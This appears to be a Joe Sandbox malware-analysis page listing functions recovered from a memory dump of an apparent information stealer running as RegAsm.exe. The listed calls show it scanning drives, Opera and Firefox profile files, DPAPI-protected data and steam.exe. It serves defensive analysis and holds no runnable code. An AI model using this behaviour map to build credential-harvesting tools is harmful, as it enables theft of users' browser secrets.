Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: e258de7ccfbc88b05f5c81bac4ff2d3afe5409b36e155eb4ecc11438824dd699
Instruction ID: 43a180df3a40888611b9bc63fd138cfc61139bc166fa6bbd32faf21f9be861c8
Opcode Fuzzy Hash: e258de7ccfbc88b05f5c81bac4ff2d3afe5409b36e155eb4ecc11438824dd699
Instruction Fuzzy Hash: 0A021C71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3192DBB86FC98F88

Function 0041510B Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0041518B
_memset.LIBCMT ref: 004151AE
GetDriveTypeA.KERNEL32(?), ref: 004151B7
lstrcpyA.KERNEL32(?,?), ref: 004151D7
lstrcpyA.KERNEL32(?,?), ref: 004151F2

Part of subcall function 00414C91: wsprintfA.USER32 ref: 00414CE5
Part of subcall function 00414C91: FindFirstFileA.KERNEL32(?,?), ref: 00414CFC
Part of subcall function 00414C91: _memset.LIBCMT ref: 00414D18
Part of subcall function 00414C91: _memset.LIBCMT ref: 00414D29
Part of subcall function 00414C91: StrCmpCA.SHLWAPI(?,004369F0), ref: 00414D4A
Part of subcall function 00414C91: StrCmpCA.SHLWAPI(?,004369F4), ref: 00414D64
Part of subcall function 00414C91: wsprintfA.USER32 ref: 00414D8B
Part of subcall function 00414C91: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414D9F
Part of subcall function 00414C91: wsprintfA.USER32 ref: 00414DC8
Part of subcall function 00414C91: _memset.LIBCMT ref: 00414DF1
Part of subcall function 00414C91: lstrcatA.KERNEL32(?,?), ref: 00414E06

lstrcpyA.KERNEL32(?,00000000), ref: 00415213
lstrlenA.KERNEL32(?), ref: 0041528D

Strings

%DRIVE_REMOVABLE%, xrefs: 004151DE
*%DRIVE_REMOVABLE%*, xrefs: 00415158
*%DRIVE_FIXED%*, xrefs: 00415127
%DRIVE_FIXED%, xrefs: 004151F9

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: f70cf054bfd7bd7e94db886a0c78c7f8cbac8e648d4c2e9bfbea61fcf2319709
Instruction ID: 33988f82ecf00ecfecbf54fa49c5e198ae7918e1112ab762dfb202f2d3925810
Opcode Fuzzy Hash: f70cf054bfd7bd7e94db886a0c78c7f8cbac8e648d4c2e9bfbea61fcf2319709
Instruction Fuzzy Hash: 6C512BB190021CEFDF219FA5CC85BDD7BB9FB09344F1040AAEA48A6111EB355E89CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9A4,0043A9A8,004369F7,004369F3,004178D1,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9AC), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9B0), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9B4,0043A9B8,?,0043A9BC,004369FE), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00416E60: CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
Part of subcall function 00416E60: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E60: Sleep.KERNEL32(000003E8,?,?), ref: 00416EC7

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: a8bf6b8a1bbf949445419f740e838100d6b56cbc23c90292a132eddbfa0ac242
Instruction ID: ed5af609bec326d0062dbff95383bd39b1ead299d8f4602d20846ca86c3f1f11
Opcode Fuzzy Hash: a8bf6b8a1bbf949445419f740e838100d6b56cbc23c90292a132eddbfa0ac242
Instruction Fuzzy Hash: A232FD71A401299BCF21FB25DD4A6CD7375AF04308F5110EAB548B71A1DBB86FC98F98

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437568,004368A7,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,0043756C), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437570), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,00437574,?,004368AA), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,00437584,004368AB), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 634b7fc9e1e4146c0777374abaf4df2ac2920775f24ce2ea54d16a3fec128fc6
Instruction ID: f0de32090b7dce6908d980c7617605791c8f857f036f1e47a574a7a376f50030
Opcode Fuzzy Hash: 634b7fc9e1e4146c0777374abaf4df2ac2920775f24ce2ea54d16a3fec128fc6
Instruction Fuzzy Hash: F7A11C71D002289BDF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F95

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,0043741C,0043681E,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437420), ref: 0040B678
StrCmpCA.SHLWAPI(?,00437424), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437428,?,0043681F), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373C8,0043680E,?,?,?), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: baebc1a45e7aaf119752818707689ceabc917cd867de663b480ae7ed75caf7ad
Instruction ID: 6eade11b5287164ec315b678d4b3624fac53bcab2c480334ad0619cdb008763a
Opcode Fuzzy Hash: baebc1a45e7aaf119752818707689ceabc917cd867de663b480ae7ed75caf7ad
Instruction Fuzzy Hash: E9812D7290021C9BCF20FB75DD46AD97779AB04308F4541A6EC08B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 270479e608ad90a1cb49832d6e2defcf0ae6c318d63da32e91448cda09a55697
Instruction ID: 832c8eeaa0435aaa3924ee45a0bd64730d5fba57cdeeabd7c0a836480c04b591
Opcode Fuzzy Hash: 270479e608ad90a1cb49832d6e2defcf0ae6c318d63da32e91448cda09a55697
Instruction Fuzzy Hash: DB012170A01228DFDB60DB64DD84BDEB7F9AB08311F8001E6E409E2290EB399F818B14

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,00436707,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: f32aa89b2440cd7c55fdd797d272bb351a0e1ff3bbd0df8fca087d200ca2fb36
Instruction ID: 2173a9732f610b1f78059f20e2b8cd6bee3a191057d87b7466e738c1724c3436
Opcode Fuzzy Hash: f32aa89b2440cd7c55fdd797d272bb351a0e1ff3bbd0df8fca087d200ca2fb36
Instruction Fuzzy Hash: 19314F71900228AFCB20EF65DD89BDEB3B9AB04304F5005EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417DFA,.exe,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4,00436CA0,00436C9C), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: 0c6284ae7c1ec9dd4d13a2abcc82e192040c6f7185e804528e3340ab270b4888
Instruction ID: 594a7061626f7aa0e5dc5c5f65b44de449b8684d73101f1e988e2d9d137db561
Opcode Fuzzy Hash: 0c6284ae7c1ec9dd4d13a2abcc82e192040c6f7185e804528e3340ab270b4888
Instruction Fuzzy Hash: D00186316002249FDB61DB60DD44FEEB7FD9F14301F8400E6E40DD2251EA798F949B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043673D,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 1396b2ce56279851626f8e536cf4b3a1d2955bc99cf5b5724ab09f3f1eec8d32
Instruction ID: 51913b6594a0ebc61adf221e1251aafbed1c942b69ef7482f2150c09c24ace5b
Opcode Fuzzy Hash: 1396b2ce56279851626f8e536cf4b3a1d2955bc99cf5b5724ab09f3f1eec8d32
Instruction Fuzzy Hash: B4118671B00214ABDB11FB65DC85BED73B9AB48708F400097F905E3291DB78AFC58B64

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
